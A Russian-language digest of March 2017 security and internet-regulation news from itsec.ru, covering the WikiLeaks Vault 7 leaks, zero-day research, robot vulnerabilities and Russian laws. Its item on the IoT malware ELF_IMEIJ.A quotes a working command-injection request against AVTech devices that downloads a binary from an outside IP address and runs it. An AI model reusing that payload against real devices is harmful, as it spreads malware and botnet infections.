• 2017-03-10 00:00 Ассанж пообещал поделиться с IT-компаниями данными о киберинструментах ЦРУ
• 2017-03-10 00:00 Уязвимости нулевого дня редко обнаруживаются более чем одной группой лиц
• 2017-03-10 00:00 Основные сведения о публикации WikiLeaks секретных материалов ЦРУ
• 2017-03-10 00:00 Госдума: применение технологии блокчейн небезопасно для контроля на выборах
• 2017-03-10 00:00 Исследование: программное обеспечение роботов кишит уязвимостями
• 2017-03-10 00:00 Правительство одобрило законопроект о товарных агрегаторах. Агрегаторы в шоке
• 2017-03-10 00:00 В Microsoft сведения Wikileaks об уязвимости Windows назвали устаревшими
• 2017-03-13 00:00 Клименко раскритиковал инициативу о замедлении доступа к сайтам компаний-нарушителей
• 2017-03-13 00:00 "Ведомости": российские власти предлагают замедлять доступ к сайтам-нарушителям
• 2017-03-13 00:00 Правозащитники: Защищенный мессенджер используется ФСБ для сбора данных
• 2017-03-13 00:00 Обнаружено новое вредоносное ПО для IoT-устройств
• 2017-03-14 00:00 Facebook запретил использовать для слежки данные пользователей
• 2017-03-14 00:00 "Коммерсантъ": ФСБ выступило против тестовых испытаний реализации "закона Яровой"
• 2017-03-14 00:00 Эксперты предложили пересмотреть принципы регулирования IT-отрасли
• 2017-03-14 00:00 Эксперты ожидают роста числа атак на промышленные IoT-устройства
• 2017-03-15 00:00 В Пакистане соцсети очистят от богохульного контента
• 2017-03-15 00:00 Gartner: у многих организаций не хватает специалистов ИБ необходимой квалификации, и они обращаются за помощью к консультантам, провайдерам сервисов управляемой безопасности и аутсорсингу
• 2017-03-15 00:00 Российские ЦОДы защитят квантовым шифрованием
• 2017-03-16 00:00 СМИ: Мессенджерам дадут пять дней на регистрацию в Роскомнадзоре
• 2017-03-16 00:00 Обнаружено новое вредоносное ПО для PoS-терминалов
• 2017-03-16 00:00 В России запретят безымянные SIM-карты
• 2017-03-16 00:00 Комитет ГД проголосовал за блокировку "зеркал" пиратских сайтов
• 2017-03-16 00:00 В Росгвардии создали подразделение киберразведки

http://www.itsec.ru/newstext.php?news_id=115406

WikiLeaks даст IT-компаниям эксклюзивный доступ к имеющимся в распоряжении организации сведениям о хакерских инструментах ЦРУ. Об этом заявил создатель WikiLeaks Джулиан Ассанж, передает РИА "Новости".

 "У WikiLeaks есть гораздо больше информации о том, что происходит с программой по кибероружию, так что… мы приняли решение работать с ними (производителями) и предоставить им эксклюзивный доступ к дополнительным техническим деталям, которые у нас есть, чтобы они смогли разработать необходимые меры", — сказал Ассанж.

 Напомним, 7 марта WikiLeaks приступил к публикации документов ЦРУ о работе над взломами смартфонов на платформах iOS и Android, а также телевизоров Samsung. Портал также утверждает, что ЦРУ умеет перехватывать сообщения защищенных мессенджеров WhatsApp, Telegram и Signal до их зашифровки, а телефоны превращать в подслушивающие устройства.

 Позже СМИ сообщили, что секретные документы ЦРУ о взломе гаджетов могли попасть в руки представителей WikiLeaks от гражданских служащих, которые работают на спецслужбы по договору. Американские спецслужбы ФБР и ЦРУ инициировали расследование утечек.

http://www.itsec.ru/newstext.php?news_id=115402

Американский стратегический исследовательский центр RAND опубликовал подробное исследование, посвященное уязвимостям нулевого дня. Отметим, к таковым относятся проблемы безопасности в продуктах, неизвестные производителям, но используемые хакерами для осуществления кибератак.

 Часто подобные уязвимости известны лишь небольшой группе лиц, например, сотрудникам спецслужб, эксплуатирующим их в своих целях. Однако, по мнению многих ИБ-экспертов и активистов, неразглашение подробностей о таких уязвимостях ставит под угрозу безопасность большого числа пользователей. Если правоохранительные органы эксплуатируют "брешь" в том или ином продукте, что мешает киберпреступникам делать то же самое? Поэтому, считают эксперты, подробности об уязвимостях нулевого дня нужно предавать огласке, чтобы производитель мог их исправить.

 Исследователи RAND собрали воедино данные о более 200 уязвимостях нулевого дня и попытались выяснить, как долго они остаются неизвестными. Отчет "Ноль дней, тысяча ночей" ("Zero Days, Thousands of Nights") охватывает период с 2002 по 2016 годы. Половина описанных в документе уязвимостей по-прежнему неизвестны общественности. По словам исследователей RAND, их отчет базируется на данных, предоставленных анонимными источниками (некоторые из них работают на правительство). В отчете представлены данные об уязвимостях в продуктах Microsoft, Mozilla, Google и Adobe, а также в Linux.

 Как сообщают эксперты, средний срок "жизни" уязвимости нулевого дня составляет 2 529 дней (6,9 года). Четверть уязвимостей едва "доживают" до полутора лет. Спустя год после начала эксплуатации только 5,7% уязвимостей обнаруживаются еще кем-то.

http://www.itsec.ru/newstext.php?news_id=115412

С тех пор, как WikiLeaks опубликовал первую порцию похищенных у ЦРУ документов, содержащих сведения о хакерском арсенале спецслужбы, в СМИ появляется все больше связанных с инцидентом новых фактов. Предлагаем вашему вниманию краткий обзор известных на сегодняшний день данных о проекте WikiLeaks под названием Vault 7.

 Первая часть документов, Year Zero, включает свыше 8,7 тысяч файлов, полученных из внутренней сети Центра кибберразведки ЦРУ в Лэнгли (Вирджиния, США). Согласно заявлению WikiLeaks, управление способно перехватывать сообщения мессенджеров WhatsApp, Telegram и Signal до того, как они будут зашифрованы, а также получать информацию с камер и микрофонов смартфонов, атаковать и инфицировать системы на базе Windows, Mac OS X, Solaris, Linux и пр. Стоит отметить, спецслужба может перехватывать данные с мобильных устройств до применения шифрования, но взламывать само шифрование WhatsApp и Signal ЦРУ пока не научилось.

Компания Apple отреагировала на публикацию WikiLeaks заявлением о закрытии в последней версии iOS большинства эксплуатируемых ЦРУ уязвимостей. Разработчики текстового редактора Notepad++ также сообщили об устранении используемых спецслужбой "дыр" в безопасности в версии продукта 7.3.3. Наряду с Google Chrome, VLC Media Player, Firefox, Opera, Thunderbird, LibreOffice, Skype и пр. данное ПО входило в список уязвимых приложений, которые спецслужба взламывала с помощью инструментов Fine Dining.

 Помимо прочего, ЦРУ интересовали уязвимости в антивирусных продуктах "Лаборатории Касперского". Среди похищенных документов оказалась датированная 2014 годом презентация главы Coseinc Хоашина Корета "Взлом антивирусного ПО". В частности, в ней идет речь об уязвимостях в антивирусном решении ЛК. Согласно презентации, "любой может без труда" разработать для них надежный эксплоит.

 По словам Корета, в продукции компании до сих пор присутствуют уязвимости, обнаруженные еще на конференции SyScan, проходившей три года назад в Сингапуре. Если верить WikiLeaks, с помощью антивирусного сканера ЛК управление маскировало свое вредоносное ПО. Согласно представителям компании, большинство упомянутых WikiLeaks уязвимостей уже исправлены. Как отмечает ЛК, в обнародованных документах ЦРУ нет никаких свидетельств эксплуатации уязвимостей в ее продуктах или антивирусных решениях других производителей.

 От всевидящего ока ЦРУ не ускользнул и растущий рынок устройств "Интернета вещей" (IoT). В частности, управление интересовалось возможностью взлома подключенных автомобилей. Подразделение ЦРУ, занимающееся исключительно вопросом встроенных устройств, рассматривало поставляемые Blackberry QNX операционные системы для "умного" автотранспорта в качестве "возможного плацдарма для проведения миссий".

 В четверг, 9 марта, основатель WikiLeaks Джулиан Ассанж заявил о намерении тесно сотрудничать с производителями упомянутого в документах ЦРУ программного обеспечения. WikiLeaks запустил в Twitter голосование, стоит ли перед публикацией очередной порции документов сначала сообщить вендорам о проблемах безопасности в их продуктах. Большинство респондентов ответило утвердительно, поэтому было принято решение предупредить производителей и дать им время на закрытие "дыр". Как именно WikiLeaks передаст технологическим компаниям информацию об уязвимостях, Ассанж не уточнил.

 Кто стоит за утечкой секретных документов ЦРУ, неизвестно. Вероятным источником являются гражданские подрядчики, работающие на спецслужбу по договору. В настоящее время ЦРУ и ФБР проводят расследование инцидента, в рамках которого выясняют, у кого из подрядчиков мог быть доступ к похищенным документам. В частности, причастными к утечке могут быть Apple, Google, Cisco Systems или Oracle. На этот раз версия о "русских хакерах" не является основной, поскольку иностранные разведки вряд ли стали бы передавать WikiLeaks столь ценные документы, а наверняка сначала использовали бы их в своих интересах.

http://www.itsec.ru/newstext.php?news_id=115420

Председатель комитета Госдумы по информационной политике, информационным технологиям и связи Леонид Левин считает, что на сегодняшний день использование нейросетей и технологии блокчейн для осуществления контроля на выборах не будет соответствовать стандартам безопасности, сообщает Агентство городских новостей "Москва".

 Комментируя предложение о введении данных технологий для контроля за выборами, поступившее в ЦИК, Левин сообщил, что предложение по использованию нейросетей и технологии блокчейн для контроля за выборами хоть и является технически реализуемым, в настоящее время не может быть осуществлено в форме полностью удовлетворяющей существующим стандартам безопасности. При том, что обе технологии уже работают и, скорее всего, являются одними из наиболее перспективных, они еще не готовы для применения на общенациональном уровне.

 По его словам, ранее были случаи утечек и фальсификации, которые приводили к серьезным репутационным проблемам у ведущих разработчиков технологий блокчейна. Если подобное произойдет на государственном уровне, будет нанесен ущерб не только авторитету государства и избирательной системы, но и в целом этому направлению развития технологий.

 Ранее лидер "Партии Роста" Борис Титов предложил ЦИК РФ использовать для контроля за ходом голосования искусственные нейронные сети и технологию блокчейн.

http://www.itsec.ru/newstext.php?news_id=115419

В компании IOActive провели проверку защищенности программного обеспечения около двух десятков роботов, в том числе промышленной машины Baxter, призванной оберегать людей от травм, робота-консьержа NAO и гуманоидного робота Pepper компании Softbank, предлагаемого для домашнего и корпоративного применения.

 Результаты исследования удручают; среди обнаруженных проблем — отсутствие защиты данных при передаче, использование слабой криптографии, возможность удаленного доступа без авторизации, выдача приватной информации, слабые конфигурации, заданные по умолчанию, и использование уязвимых фреймворков с открытым кодом. При этом у всех проверенных роботов выявлено по нескольку из перечисленных недоработок.

 Пораженные простотой взлома роботов, исследователи отмечают, что последствия могут быть губительными — к примеру, домашние машины под контролем злоумышленников помимо слежки за людьми могли бы отпирать двери, отключать сигнализации, портить вещи, устраивать пожары, травмировать людей и т. д., а промышленные, обычно гораздо более мощные, способны причинять еще больший вред.

 Исследование указывает на то, что до сих пор производители роботов отдавали приоритет скорейшему выпуску на рынок перед обеспечением безопасности. Та же ситуация характерна для индустрии устройств Интернета вещей, из-за чего многие из них плохо защищены, отмечают авторы.

http://www.itsec.ru/newstext.php?news_id=115415

Правительство отрегулирует товарных агрегаторов

Правительство одобрило законопроект о совершенствовании госрегулирования защиты прав потребителей, приобретающих товары и услуги в интернете. Об этом говорится в сообщении разработчика документа - Роспотребнадзора.

В пояснительной записке к документу сказано, что по мере развития сети интернет все серьезнее становятся проблемы, связанные с неурегулированными сегментами в электронной торговли. Речь идет, в первую очередь, о регулировании деятельности товарных агрегаторов, крупнейшим из которых является "Яндекс.Маркет".

Почему нужно регулировать агрегаторов

Из-за отсутствия регулирования в настоящее время агрегаторы не несут бремя соблюдения прав потребителей на предоставление информации о продавцах. При этом агрегаторы аккумулируют значительные суммы средств, направляемых покупателями на покупку товаров. Авторы законопроекта указывают, что законодательство ЕС и Белоруссии уже обязывает товарные агрегаторы соблюдать права потребителей.

Согласно законопроекту (его текст имеется в распоряжении СМИ), "под агрегатором понимается организация или индивидуальный предприниматель, который позволяет потребителю в сети интернет одновременно ознакомиться с предложениями продавцов каких-либо товаров, заключить с ними договора купли-продажи и произвести предварительную оплату путем перевода средств на банковский счет.

Продавец вправе потребовать от организаций и индивидуальных предпринимателей, уполномоченных действовать в интересах продавцов и изготовителей, предоставить подтверждение таких полномочий. Такого рода организации, как и агрегаторы, обязаны довести до потребителе информацию о себе и об изготовителях и продавцах товаров."

Ответственность агрегаторов

Если агрегатор предоставил недостоверную информацию о товаре или продавце, то ему придется нести ответственность за убытки, причиненные потребителю вследствие предоставления ему такой информации. В то же время ответственность за надлежащее соблюдение договоров, заключенных продавцом с покупателем с помощью агрегатора, а также за надлежащее качество переданных покупателем товаров лежит на продавце.

Агрегатор обязан вернуть внесенную ему покупателем предоплату в случае, если товар не был доставлен в срок и потребитель проинформировал продавца о расторжении по этой причине договора купли-продажи. Возврат средств должен быть осуществлен в течение десяти дней с момента получения агрегатором претензии от продавца.

Аналогично агрегатор обязан вернуть средства покупателя в случае, если он отказался принять товар по причине предоставления агрегатором недостоверной информации о товаре или о продавце. Но если продавец сообщит агрегатору о принятии покупателем товара, то агрегратор в вышеупомянутых случаях будет вправе не возвращать денежные средства.

Не та версия законопроекта

Первая версия данного законопроекта появилась еще в 2015 г. В работе над документом принимала участие Ассоциации компаний интернет-торговли (АКИТ). С тех пор к документу неоднократно высказывались замечания, в том числе против принятия такого рода закона был "Яндекс" (владелец "Яндекс.Маркет").

В предыдущей версии законопроекта говорилось о том, агрегатор должен нести ответственность в случае предоставления недостоверной информации о товаре или продавце "за реальный ущерб" потребителю в пределах суммы предварительной оплаты, переведенной на банковский счет агрегатора. Однако Минюст посчитал такую формулировку неудачной: в случае размещения недостоверной информации агрегаторов только агрегатор должен нести за нее ответственность, поскольку продавец никаких нарушений не совершал.

В пресс-службе "Яндекса" отмечают, что одобренная правительством версия законопроекта "в корне отличается" от версии документа, которая летом 2016 г. была согласована бизнес-сообществом и различными ведомствами.

В нынешней версии документ учитывает роли агрегатора, который всего лишь выполняет роль информационного посредника между потребителей и продавцом, возлагает на него чрезмерную ответственность и фактически приравнивает агрегатора к продавцу. Принятие документа в таком виде создаст большие проблемы малому бизнесу, для которого агрегаторы зачастую являются основным каналом дистрибуции.

Агрегатор окажется в полной зависимости от продавца

Куратор рабочей группы "Связь и ИТ" Экспертного совета при Правительстве Ирина Левова также говорит, что документ в нынешнем виде отличается от той версии законопроекта, которая в 2016 г. была согласована на рабочей группе при Роспотребднадзоре.

В частности, из нынешней версии законопроекта следует, что агрегатор должен будет нести ответственность за ретрансляцию любой информации от продавца, а не только заведомо ложной, как было в предыдущей версии документа.

В то же время агрегатор "не держит в руках товар" и не имеет возможности в каждом случае проверить достоверность переданной информации о нем. Также в нынешней версии законопроекта нет ранее присутствовавшей нормы об ограничении ответственности агрегатора в пределах поступившей на его счет суммы предоплаты. Это ставит агрегатора в полную зависимость от продавца и позволяет покупателя требовать возмещения убытков как с продавца, так и с агрегатора, недоумевает Левова.

Наконец, крайний срок для рассмотрения агрегатором претензий не позволяет ему проверить, действительно ли покупатель не получил или отказался от получения товара. Это создает большую почву для злоупотреблений, предупреждает Левова.

"М.Видео" поддерживает законопроект

В то же время руководитель маркетплейса Goods (недавно запущен "М.Видео") Семен Кунин говорит, что данная платформа изначально запускалась с максимально полной и проверенной информацией по каждой категории товаров и по каждому продавцу и с максимальной ответственность за качество товаров, сертификацию, возможный обмен и возврат. Аналогичные общие требования для всего рынка, закрепленные законодательно, повысят прозрачность российского ритейла и защитят права потребителей, уверен Кунин.

Теперь законопроект поступит на рассмотрение Госдумы. В случае его принятия документ вступит в силу только через 180 дней. В Роспотребнадзоре объясняют столь длительный срок необходимостью создать переходный период для субъектов предпринимательской деятельности.

http://www.itsec.ru/newstext.php?news_id=115424

Опубликованные порталом WikiLeaks сведения об уязвимости устройств на операционной системе Windows по большей части уже устарели. Как передает ТАСС, об этом заявила представитель корпорации Microsoft в России Кристина Давыдова.

 "Результаты нашего первичного расследования показали, что большая часть информации устарела и относится к более ранним версиям систем. Вероятнее всего, большая часть выявленных проблем уже решена в современных системах", — сказала она.

 Представитель Microsoft подчеркнула, что компания "очень серьезно относится к проблемам безопасности и продолжает вести более углубленный анализ, чтобы при необходимости предпринять дополнительные шаги для обеспечения защиты пользователей". "Для лучшей защиты от современных угроз безопасности мы рекомендуем использовать операционную систему Windows 10, которая предусматривает автоматическое обновление", — резюмировала она.

 Ранее корпорация Apple в связи с публикацией WikiLeaks заявила об устранении большинства уязвимостей IPhone в последней версии. В компании пообещали продолжить аналогичную работу. В свою очередь представители Google заявили, что пользователи устройств на Android и Chrome защищены от описанных порталом взломов. Позже основатель WikiLeaks Джулиан Ассанж пообещал, что портал даст IT-компаниям эксклюзивный доступ к сведениям о хакерских инструментах ЦРУ.

 Напомним, 7 марта WikiLeaks приступил к публикации документов ЦРУ о работе над взломами смартфонов на платформах iOS и Android, а также телевизоров Samsung. Портал также утверждает, что ЦРУ умеет перехватывать сообщения защищенных мессенджеров WhatsApp, Telegram и Signal до их зашифровки, а телефоны превращать в подслушивающие устройства.

 Позже СМИ сообщили, что секретные документы ЦРУ о взломе гаджетов могли попасть в руки представителей WikiLeaks от гражданских служащих, которые работают на спецслужбы по договору. Американские спецслужбы ФБР и ЦРУ инициировали расследование утечек.

http://www.itsec.ru/newstext.php?news_id=115437

Снижение скорости доступа к сайтам компаний, не исполняющих в полной мере требования российского законодательства, может повлечь за собой рост доли шифрованного трафика до 100% и вследствие этого оказаться неэффективной мерой. Такое мнение высказал советник президента России по вопросам развития интернета и председатель совета Института развития интернета Герман Клименко

 "Если допустить что такая инициатива действительно существует, о чем я не знаю, то надо сказать, что пользы от нее будет, как от вечной блокировки доменов. Масса информационных поводов — скандалов и разбирательств. И из 70% шифрованного трафика получится 100%, так как все попытки „замедлить" будут бороться простым плагином в браузер. ИРИ не в курсе этой истории", — сказал он агентству RNS.

 Ранее газета "Ведомости" сообщила, что в российском правительстве обсуждают идею законопроекта, предполагающего снижение скорости доступа к сайтам иностранных компаний, которые нарушают российские законы. По данным издания, проект закона готовят Федеральная антимонопольная служба, Роскомнадзор и другие ведомства. Один из собеседников газеты отметил, что сейчас инициатива находится "на финальной стадии" согласования в Кремле.

http://www.itsec.ru/newstext.php?news_id=115434

Российские власти задумались о введении меры по замедлению скорости доступа к сайтам интернет-компаний, нарушивших российский закон. Необходимые поправки вскоре могут быть внесены в законодательство. Об этом газете "Ведомости" рассказали сотрудники нескольких интернет-компаний, операторов связи, чиновники двух ведомств и человек, знакомый с сотрудниками администрации президента.

Поправки, позволяющие замедлять скорость доступа, могут быть внесены уже весной этого года. Предполагается, что распространяться эта норма будет не только на иностранные компании.

По словам одного из источников, среди разработчиков проекта значится Федеральная антимонопольная служба. Эту информацию подтвердил человек, близкий к ведомству. Он также добавил, что в разработке участвуют Роскомнадзор и другие ведомства, причем инициатива уже находится на финальной стадии согласования, в том числе в администрации президента.

Другой собеседник газеты отметил, что вероятность введения такого регулирования "очень велика". Впрочем, другой источник заявил, что слышал об идее, однако в текущем виде она труднореализуема и вряд ли будет принята. По его словам, проще значительно увеличить штрафы для нарушителей, чем внедрять столь сложную технически задачу.

Пресс-секретарь президента РФ Дмитрий Песков заявил, что о такой инициативе не знает. В Госдуме же сообщили, что до нижней палаты парламента документ еще не доходил.

Операторы от такой идеи не в восторге, поскольку абоненты будут винить в замедлении доступа к, например, Twitter или YouTube, именно компании связи. "Следствием принятия такого закона может стать нарушение сетевой нейтральности, которое затронет все ресурсы, в том числе и нас", - констатировал топ-менеджер "Яндекса".

Один из руководителей неназванного интернет-холдинга подтвердил, что такая идея действительно сейчас активно обсуждается чиновниками. По его словам, реализовать ее гораздо сложнее, чем простую блокировку. Особенно если речь идет об операторах фиксированной связи, у которых огромная децентрализованная сеть. Мобильным операторам это сделать чуть проще.

Источники издания добавили, что инициатива родилась в ходе обсуждения дела ФАС против Google. В конце 2015 года ведомство признало корпорацию нарушителем закона о защите конкуренции, выписало ей штраф и предписало устранить нарушения, однако Google эти требования не выполнил. Недавно руководитель службы Игорь Артемьев заявил, что за это "Google ждет много интересного", не уточнив, о чем идет речь.

http://www.itsec.ru/newstext.php?news_id=115433

Как сообщают специалисты общественной организации "Роскомсвобода", защищенный швейцарский мессенджер Threema предположительно используется российскими спецслужбами для сбора информации. Сотрудники проекта обнаружили web-версию приложения для обмена сообщениями в Реестре организаторов распространения информации (РОРИ). Действующий в РФ закон №97 обязывает указанные в РОРИ организации "собирать, хранить и предоставлять информацию о действиях пользователей на своем ресурсе уполномоченным госорганам".

 Threema приобрел популярность у российских пользователей летом прошлого года после принятия так называемого "закона Яровой". В частности мессенджером начали пользоваться представители силовых структур, ИБ-эксперты, госслужащие и бизнесмены.

 Согласно заявлению разработчиков мессенджера изданию TJ, работа их компании осуществляется в рамках законодательства Швейцарии и не занимается сбором сведений о пользователях и передачей их зарубежным спецслужбам. По словам представителей Threema, приложение было внесено в реестр Роскомнадзором. Российский регулятор сам  запросил у швейцарцев имя, физический и web -адрес сервиса, пояснили разработчики.

 По словам экспертов "Роскомсвободы", приложение может не хранить данные пользователей, если будет готово обеспечить спецслужбам доступ к ним "в полном объеме на постоянной основе и без каких-либо запросов". Как пояснили специалисты, к пользовательской информации относятся метаданные, контакты адресной книги и электронной почты, число и размер сообщений, а также точное время авторизации через сторонние ресурсы.

http://www.itsec.ru/newstext.php?news_id=115429

Долгое время ОС на базе ядра Linux остаются приоритетными у производителей устройств "Интернета вещей" (IoT). В связи с этим для Linux появляются все новые и новые угрозы. В прошлом году большую известность приобрело вредоносное ПО Mirai, инфицирующее IoT-устройства и включающее их в ботнет.

 Исследователи Trend Micro сообщили  о новом образце вредоносного ПО для Linux под названием ELF_IMEIJ.A (по классификации Trend Micro). Вредонос эксплуатирует известные уязвимости в системах безопасности производства крупной тайваньской компании AVTech. Проблемы были обнаружены экспертами Search-Lab. Исследователи пытаются связаться с производителем еще с октября 2016 года, однако безуспешно.

 Уязвимости в устройствах AVTech позволяют выполнить удаленный файл на стороне атакуемого сервера с помощью скриптов cgi-bin. С целью проэксплуатировать уязвимость злоумышленник отправляет на произвольный IP-адрес запрос POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http:// 192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1. С помощью уязвимости хакер может внедрить команду и запустить процесс загрузки на устройство вредоносного ПО.

 Точкой входа для ELF_IMEIJ.A служат IP-камеры, системы видеонаблюдения и сетевые записывающие устройства производства AVTech. Попав на устройство, вредонос собирает данные о системе и сетевой активности. ПО также способно получать от киберпреступников команды и выполнять их, например, для запуска DDoS-атаки или самоуничтожения. Устройства, находящиеся в одной сети с зараженным, также подвергаются опасности.

http://www.itsec.ru/newstext.php?news_id=115459

Руководство компании Facebook запретило разработчикам использовать хранящуюся в соцсети информации для создания программ для слежки, сообщает "Газета.Ru".

Новый запрет гласит, что разработчики, которые получают доступ к данным пользователей для создания приложений, должны защищать информацию, которую они получают от несанкционированного доступа, использования или раскрытия.

Отмечается, что ранее у соцсети не было политики, запрещающей создателям приложений использовать информацию пользователей для слежки.

Ранее администрация соцсети Facebook решила разнообразить личную переписку пользователей, напоминает "Национальная служба новостей". Так, уже в ближайшее время пользователи в тестовом режиме смогут ставить лайки и дизлайки в личных сообщениях, а также реагировать на них при помощи смайликов.

http://www.itsec.ru/newstext.php?news_id=115462

Федеральная служба безопасности (ФСБ) выступила против пилотного тестирования операторами связи и интернет-компаниями "закона Яровой". Об этом сообщает "Коммерсантъ" со ссылкой на источники, участвовавшие в заседании рабочей группы "Связь и IT" экспертного совета при правительстве.

По словам источника, в заседании рабочей группы участвовали представители "Яндекса", операторов "большой четверки", Минкомсвязи и ФСБ. Представители ФСБ на встрече выступили против создания пилотных зон для тестирования требований закона. По мнению ведомства, для реализации закона будет достаточно создания подзаконных актов, разрабатываемых рабочей группой Минкомсвязи.

Вместе с тем ФСБ поддержала предложения рабочей группы по поэтапному вступлению закона в силу. Представители службы предложили операторам и интернет-компаниям начать хранение данных с одного месяца, постепенно увеличив срок хранения данных до шести месяцев.

Ранее экспертный совет при правительстве совместно с операторами связи составил план технических испытаний, согласно которому до 1 августа 2017 года планировалось опробовать действие "закона Яровой" на инфраструктуре операторов связи и интернет-площадок в отдельных регионах. "Ситуация сложная, наша инициатива отвергнута, куда двигаться дальше, пока непонятно", — заявил изданию представитель одного из операторов связи, присутствовавший на совещании. "Позиция министерства — воздержаться от голосования — связана с тем, что вопрос требовал более тщательной проработки со всеми заинтересованными сторонами", — заявил изданию представитель Минкомсвязи Дмитрий Захаров.

В "Ростелекоме", "Вымпелкоме", МТС и Tele 2 от комментариев отказались. Представители "Мегафона" отметили, что выступают за создание пилотных зон: по мнению оператора связи, реализация этого сценария поможет рынку объективно оценить ситуацию.

http://www.itsec.ru/newstext.php?news_id=115468

Рабочая группа экспертного совета "Связь и IT" подготовила предложения о новых принципах регулирования IT-отрасли, сообщает издание "Известия". Как отмечается, в настоящее время нормативное регулирование высоких технологий значительно отстает от самих технологий. Данная ситуация обусловлена тем, что нормы, касающиеся IT, распределены по большому числу законов и постановлений.

 Согласно представленному участниками рабочей группы докладу, сейчас сфера связи, информации и информационных технологий регулируется множеством законов, принятых в 2003-2006 годах и с тех пор претерпевших ряд изменений. Речь идет о законах "О связи", "Об информации...", "О персональных данных", "О СМИ", "О государственной тайне", "Об архивном деле", "Об электронной подписи" и пр. К примеру, закон "О связи" от 2003 года рассчитан на регулирование телефонной и телеграфной связи, но сейчас вместо многих сетей развивается единая сеть интернет, включающая множество сервисов, отметила координатор рабочей группы Ирина Левова.

 Эксперты предлагают перейти от "вертикального" (отраслевого) подхода к "горизонтальному", предполагающему регулирование четырех уровней правоотношений, связанных с обработкой и передачей цифровых данных. Первый уровень - операторы связи, второй - адресация и идентификация в сети, базовые услуги передачи информации, третий - сервисы и шифрование информации и четвертый - контент и авторские права на него.

 Вице-президент "Ростелекома" Александр Маслов считает предложенный подход интересным и имеющим право на существование. По его словам, основные законы о связи и информационные технологии были приняты более 10 лет назад. С тех пор изменились и рынки, и технологии, поэтому необходимость в пересмотре законодательства очевидна.

 В Минкомсвязи отказались комментировать инициативу рабочей группы. В настоящее время в министерстве обсуждают возможность создания "Цифрового кодекса", который объединит все нормы, регулирующие интернет.

http://www.itsec.ru/newstext.php?news_id=115481

В 2017 году ИБ-эксперты ожидают роста числа атак на промышленные устройства "Интернета вещей" (Industrial Internet of Things, IIoT). IIoT представляют собой встроенные устройства, использующиеся на предприятиях критической инфраструктуры (сфера водоснабжения, энергетический сектор, правительственные организации, здравоохранение и финансовый сектор).

 По данным опроса, проведенного исследователями Dimensional Research среди ИБ-экспертов, 96% респондентов ожидают роста числа атак на IIoT в нынешнем году. 60% готовятся к значительному росту, а 36% - к незначительному. 51% опрошенных отметили, что не готовы к отражению кибератак на незащищенные IIoT-устройства. 46% респондентов осознали необходимость защиты используемых на предприятиях встроенных устройств, так как они приобретают все большую популярность у хакеров.

 По словам старшего директора по технологиям компании Tripwire Дэвида Мелцера (David Meltzer), на предприятиях отлично понимают угрозу безопасности, представляемую промышленным "Интернетом вещей". Как пояснил эксперт, есть только два возможных варианта – либо должным образом подготовиться к возможным попыткам взлома, либо позволить хакерам атаковать системы. "Реальность такова, что кибератаки в промышленной сфере чреваты ужасными последствиями с точки зрения безопасности и возможности осуществлять критически важные операции", - цитирует Мелцера издание Help Net Security.

 Как пояснил исследователь компании International Data Corporation Роберт Уэстервельт (Robert Westervelt), в настоящее время риски не ограничиваются только потерей данных. IT-отделы предприятий обеспокоены тем, чтобы защитить критически важные технологические процессы. "Возьмем, к примеру, электростанцию. Кибератаки могут стать причиной отключения электроснабжения населения, тем самым поставив под угрозу жизни и безопасность людей", - отметил Уэстервельт.

 90% участников опроса ожидают увеличения числа используемых на предприятиях IIoT-устройств. По мнению 94% респондентов, рост числа IIoT-устройств увеличит риски кибератак.

http://www.itsec.ru/newstext.php?news_id=115495

Премьер-министр Пакистана Наваз Шариф дал распоряжение очистить социальные сети от богохульного контента. Как сообщает РИА "Новости", соответствующее заявление премьера его партия Пакистанская мусульманская лига (Н) опубликовала в Twitter.

 "Правоохранители должны искать людей, распространяющих богохульные материалы, и преследовать их по закону. Богохульный контент в социальных медиа – подлый заговор с целью оскорбить религиозные чувства всей мусульманской уммы", — заявил премьер.

 По его словам, вопросом об очищении соцсетей от богохульного контента уже занимаются органы юстиции. Премьер-министр распорядился, кроме того, чтобы уполномоченные пакистанские органы подняли этот вопрос с представителями зарубежных сетей.

 Как отмечает РИА, такое заявление Шарифа прозвучало на фоне скандала, который произошел в январе, когда пятеро блогеров-оппозиционеров пропали без вести на несколько недель при противоречивых обстоятельствах. позже один из них – Ваккас Гория – заявил, что его удерживала "государственная структура", связанная с военными, и что его пытали. Кампания в поддержку пропавших вызвала ответную кампанию их противников, которые обвинили блогеров в богохульстве, которое по законам Пакистана может караться смертной казнью. На минувшей неделе Высокий суд Исламабада постановил расследовать активность этих блогеров.

http://www.itsec.ru/newstext.php?news_id=115511

В 2017 году расходы на обеспечение информационной безопасности вырастут в мире до 90 млрд долл., что на 7,6% больше прошлогоднего, а к 2020 году превысят 113 млрд долл., полагают аналитики Gartner. При этом больший интерес корпоративных покупателей привлекают уже не средства предотвращения атак, а средства их выявления и отражения, отмечают аналитики.

 В течение ряда лет наиболее распространенным подходом к обеспечению безопасности было предотвращение атак. В связи с этим у многих организаций не хватает опыта и квалифицированных специалистов в области выявления и отражения атак, и они обращаются за помощью к консультантам, провайдерам сервисов управляемой безопасности (MSSP) и аутсорсингу.

 Спрос на средства выявления и отражения атак привел к созданию новых сегментов рынка: средств маскировки, выявления и отражения для конечных точек (EDR), программно-конфигурируемой сегментации, брокеров безопасного доступа в облако (CASB) и технологий анализа поведения пользователей и объектов (UEBA). Появление специализированных сервисов управляемого выявления и отражения атак (MDR) грозит потерей клиентов традиционным провайдерам MSSP. Тем временем из-за проблем, связанных с ростом числа средств, службы безопасности прибегают к платформам и сервисам администрирования, лучше интегрированным с соседними сегментами рынка.

http://www.itsec.ru/newstext.php?news_id=115509

Российские специалисты получили от Минобрнауки грант на разработку защиты квантовым шифрованием для распределенных дата-центров, пишут "Известия".

 Минобрнауки выдало трехлетний грант на создание системы управления дата-центром, включая виртуализацию ресурсов с использованием квантовой технологии защиты линий связи. 160 млн руб. получит самарское АО "Смартс", в проекте участвуют специалисты Университета ИТМО и ООО "Би Питрон". Комплекс программных средств будет разработан к 2020 году.

 По словам заместителя технического директора "Смартс" Алексея Николаева, будет создан распределенный ЦОД из трех локаций, объединенных оптическими линиями связи. Вначале будут написаны программы для управления географически распределенными ЦОД. На втором этапе в систему внедрят квантовую технологию защиты каналов связи. Полученную систему управления можно будет подключить к любому другому ЦОД.

